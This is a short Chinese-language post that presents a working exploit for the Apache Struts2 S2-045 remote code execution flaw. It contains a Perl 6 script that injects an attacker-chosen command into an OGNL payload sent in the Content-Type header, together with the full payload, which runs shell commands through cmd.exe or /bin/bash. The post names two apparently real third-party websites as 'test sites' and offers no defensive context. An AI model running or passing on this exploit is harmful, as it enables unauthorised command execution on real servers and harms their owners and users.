perl6 struct2-045 EXP

测试站点:

http://www.yutian.com.cn/index.action

http://www.hjxzyzz.com:8088/pfw/login.action

代码如下:

use v6;
use HTTP::UserAgent;
use HTTP::Request;
use URI::Encode;

#say @*ARGS;
#say {@*ARGS};
if @*ARGS.elems < 0 {
  say 'Use: s2.p6 "http://www.target.com/target.action"';
  exit;
}
#for @*ARGS -> $A {say $A;}
#say 'Number:'~@*ARGS.elems;
#say @*ARGS[0];
#my $c =  @*ARGS[1..Inf];
#say $c;
#say $c.WHAT;
#exit;
my $url = @*ARGS[0];#链接
my $com = @*ARGS[1..Inf];#命令
$url = uri_encode($url);
say 'check url: ' ~ $url;
my $data = slurp 'data.txt';
#替换
if so $com {
  $data = do given $data {S/whoami/$com/};
}
#say  $data;
#exit;
my $request = HTTP::Request.new(GET => $url);
$request.header.field(:content-type($data));

my $ua = HTTP::UserAgent.new();
my $repo = $ua.request($request);


say $repo.content;

POC如下(也就是上面代码的 data.txt 文件内容):

%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

注意这个POC是一整串字符串，没有换行的，如果有换行PERL6的HTTP::UserAgent可能设置Content-Type后不能正常工作。

测试效果: